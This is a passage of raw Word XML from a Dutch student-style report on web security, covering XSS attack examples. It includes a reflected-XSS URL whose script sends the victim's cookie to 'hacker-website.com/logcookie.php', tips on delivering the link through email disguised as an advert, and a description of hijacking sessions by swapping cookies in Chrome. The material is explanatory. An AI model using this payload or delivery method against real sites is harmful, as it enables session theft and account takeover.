        <w:t>Ik zal zoals bij de SQLi een case aantonen hoe schadelijk XSS kan zijn voor gebruikers. In deze case zal de hacker een cookie stelen met waardevolle data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048980D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC9EC86" w14:textId="2461C755" w:rsidR="00474843" w:rsidRDefault="00474843" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF00F7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253276160" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A3638F3" wp14:editId="0A5D891B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1012112</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="850" name="Rectangle 8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72132" id="Rectangle 850" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-79.65pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00EF00F7">
        <w:t>XSS voorbeelden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F80E4" w14:textId="7809D2C4" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simpele cookie ste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8097D8" w14:textId="17214F68" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">In dit voorbeeld wordt er een XSS-aanval via de adresbalk uitgevoerd. De website vraagt om de gebruikersnaam (username) van een gebruiker zodat het op de website kan worden uitgeprint als hyperlink. De gebruiker is ingelogd met zijn account en maakt gebruik van een sessie ID. Deze sessie ID’s worden door de browser opgeslagen in een cookie bestand dat op de lokale systeem van het slachtoffer wordt geplaatst.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E44C3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3EE117" wp14:editId="134E3B1A">
            <wp:extent cx="5760720" cy="643890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="84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50">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5AB0BA17" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFE89C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00367610" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253265920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B3DFEC8" wp14:editId="54640A2F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>22860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3437255" cy="1057910"/>
                <wp:effectExtent l="0" t="0" r="10795" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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9EBBFBA" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003F2F0E">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Output:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00771C98" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00771C98">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Hi Tom!</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE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FEC8" id="_x0000_s1265" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:.85pt;width:270.65pt;height:83.3pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="79EBBFBA" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F2F0E">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Output:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00771C98" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00771C98">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Hi Tom!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00367610" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB83DC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="762E6AEE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="6DC92EC2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="5A13C3E2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253266944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CE78A83" wp14:editId="43CB317B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>450850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5593715" cy="907415"/>
                <wp:effectExtent l="0" t="0" r="19685" b="32385"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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07415"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="50000"/>
                              <a:lumOff val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                            <w:r w:rsidRPr="00160FF3">
                              <w:t>http://www.voorbeeld-xss.nl?username=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&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8A83" id="_x0000_s1266" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:35.5pt;width:440.45pt;height:71.45pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">
                      <w:r w:rsidRPr="00160FF3">
                        <w:t>http://www.voorbeeld-xss.nl?username=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>In dit scenario weet de hacker dat de website kwetsbaar is tegen XSS aanvallen. De hacker bouwt een URL op die hij door de slachtoffer laat uitvoeren. De URL bestaat uit vier delen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E953C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFFA5C" w14:textId="3A2193E4" w:rsidR="00CF3AE8" w:rsidRPr="00A02127" w:rsidRDefault="00272FA3" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253278208" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A07CC61" wp14:editId="2E0D7D08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-901952</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="851" name="Rectangle 8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EC04F" id="Rectangle 851" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.95pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CF3AE8" w:rsidRPr="00A02127">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Structuur van URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F473EA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. URL plus de query username van de website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F9F57" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.  HTML script element met de javascript Windows.location.href</w:t>
      </w:r>
      <w:r w:rsidRPr="00997215">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60A372" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. de URL van de hackers website met als query cookie en als waarde het cookie van het slachtoffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B3A41" w14:textId="58EA934B" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A6DAC1" w14:textId="3B2398AE" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502303CA" w14:textId="067E987C" w:rsidR="00CF3AE8" w:rsidRPr="00D327A4" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D327A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voorwaarden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5548E0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voor de werking van deze XSS-aanval is het nodig dat de gebruiker is ingelogd, want anders is er geen sessie id gegenereerd en dus ook geen kwetsbaarheid om te exploiteren. Dit betekend dat de website enkel kwetsbaar wordt als er gebruikers ingelogd zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9BA2D" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De exploitatie kan op elke website gebeuren waar gebruikerscontent gepubliceerd kan worden. Een ander manier is om de selectie van slachtoffers een email te sturen met de link, het liefst verbogen in een klikbare afbeelding zoals een advertentie of een uitnodigende hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC83368" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253267968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E02175A" wp14:editId="1146B7FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>23072</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>75142</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2379133" cy="762000"/>
                <wp:effectExtent l="19050" t="0" r="40640" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="837"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C1109" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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2175A"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267" type="#_x0000_t54" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:5.9pt;width:187.35pt;height:60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" adj=",18000" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F3C1109" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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3268992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="610CDB51" wp14:editId="4546A90A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2757594</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3817620" cy="512445"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8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7A1ADEF" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="006B40B9" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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CDB51" id="_x0000_s1268" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:217.15pt;margin-top:22.55pt;width:300.6pt;height:40.35pt;z-index:-2500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l+2YRScCAAAmBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAvx5CSN8AAAALAQAADwAAAAAAAAAAAAAAAAB/BAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="27A1ADEF" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="006B40B9" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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E68D535" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253270016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42CFACB7" wp14:editId="3421B848">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2351405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>91440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="389467" cy="262467"/>
                <wp:effectExtent l="0" t="19050" r="29845" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="839"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790D0"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32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" adj="14322" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7FD1C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D22C48" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="2146177B" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E01CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>FIGUUR 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF8A46" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Zodra de niets vermoedende gebruiker erop klikt wordt de sessie ID weggeschreven naar een tekstbestand op het systeem van de hacker. De verzamelde sessie ID’s kan de hacker vervolgens gebruiken om toegang te krijgen tot de accounts van de slachtoffers. De hacker doet dit door zijn eigen sessie ID te veranderen in die van zijn slachtoffer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6868F0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D47336" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47336">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cookies veranderen in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E79EF" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253271040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CA766CB" wp14:editId="0D1F3BE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3919855" cy="736600"/>
            <wp:effectExtent l="25400" t="0" r="42545" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="847" name="Diagram 8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14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Met de Console van Chrome kun je in Javascript de cookies veranderen van waarden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E888E3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>Javascript commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD835BE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253272064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="024A1C09" wp14:editId="70223632">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4275455" cy="405765"/>
                <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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F168C55" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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A1C09" id="_x0000_s1269" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.65pt;width:336.65pt;height:31.95pt;z-index:2532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">
                <v:textbox style="mso-fit-shape-to-text:t">
